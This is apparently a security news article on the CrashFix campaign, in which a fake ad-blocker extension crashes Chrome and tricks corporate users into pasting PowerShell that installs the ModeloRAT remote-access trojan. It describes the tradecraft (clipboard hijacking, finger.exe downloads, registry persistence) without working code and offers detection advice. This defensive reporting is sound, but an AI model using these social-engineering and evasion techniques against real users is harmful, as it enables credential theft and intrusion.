CrashFix Malware Crashes Browsers to Trick Enterprise Users

Microsoft's security team flagged a new ClickFix variant that deliberately crashes victims' browsers, then tricks them into executing malicious commands under the guise of a repair procedure. The campaign, dubbed CrashFix, specifically targets domain-joined corporate workstations—ignoring consumer systems entirely.

Microsoft's threat intelligence blog describes CrashFix as a "notable escalation in ClickFix tradecraft" that combines user disruption with social engineering to boost infection rates while avoiding traditional exploit techniques.

How CrashFix Works

The attack chain starts with a malicious Chrome extension called NexShield, which masquerades as the legitimate uBlock Origin Lite ad blocker. The extension has appeared on unofficial download sites and in phishing campaigns directing users to fake Chrome Web Store pages.

Once installed, NexShield deliberately destabilizes Chrome through excessive memory allocation and DOM manipulation until the browser crashes. When Chrome restarts, the extension displays a fake "critical error" popup claiming the browser detected stability issues and needs repair.

The "Fix Now" button doesn't run code directly. Instead, it instructs users to open Windows Run (Win+R), paste a command from the clipboard, and press Enter. NexShield silently copies malicious PowerShell to the clipboard before showing the popup. The command looks benign—something like sfc /repair chrome—but actually downloads and executes a Python-based RAT called ModeloRAT.

This technique bypasses most endpoint protections because the victim manually executes the payload. No exploit is needed; the user does the attacker's work.

Enterprise Targeting

CrashFix only activates on domain-joined machines. The extension checks for Active Directory membership before triggering the crash sequence. Consumer PCs and standalone workstations are ignored.

This selective targeting makes sense financially. Corporate networks contain higher-value data, and a single compromised workstation provides lateral movement opportunities. The attackers behind CrashFix—tracked as KongTuke—have operated since at least 2025, consistently focusing on business environments.

ModeloRAT Capabilities

The final payload communicates with command-and-control servers through periodic beacon requests. Core capabilities include:

• Screenshot capture
• Keylogging
• File exfiltration
• Browser credential theft
• Arbitrary command execution

ModeloRAT establishes persistence via a Run registry entry, ensuring it survives reboots. The Python-based architecture makes analysis and detection somewhat easier than compiled malware, but also allows rapid modification between campaigns.

Living-Off-the-Land Abuse

One particularly clever element: the PowerShell command abuses finger.exe, a legitimate Windows utility originally designed to retrieve user information from remote systems. Using finger.exe to download payloads evades detection rules focused on more common LOLBins like certutil or bitsadmin.

We've seen similar LOLBin abuse in other recent campaigns where attackers chain together legitimate Windows utilities to avoid triggering behavioral detections.

Detection and Defense

Organizations should:

1. Block unauthorized Chrome extensions - Use Chrome enterprise policies to whitelist approved extensions only
2. Monitor for finger.exe network activity - This utility has no legitimate reason to make outbound connections in most environments
3. Train users on clipboard attacks - CrashFix relies on users willingly pasting and executing commands
4. Alert on PowerShell execution from Run dialog - The combination of Win+R with PowerShell commands warrants investigation

The social engineering aspect is harder to defend against technically. Users who believe their browser is genuinely broken may follow "repair" instructions without suspicion. Security awareness training should specifically address scenarios where software prompts users to run commands—legitimate applications almost never require this.

For organizations that have seen CrashFix indicators, assume compromise and investigate affected workstations for ModeloRAT artifacts. The RAT's registry persistence and beacon traffic provide detection opportunities post-infection.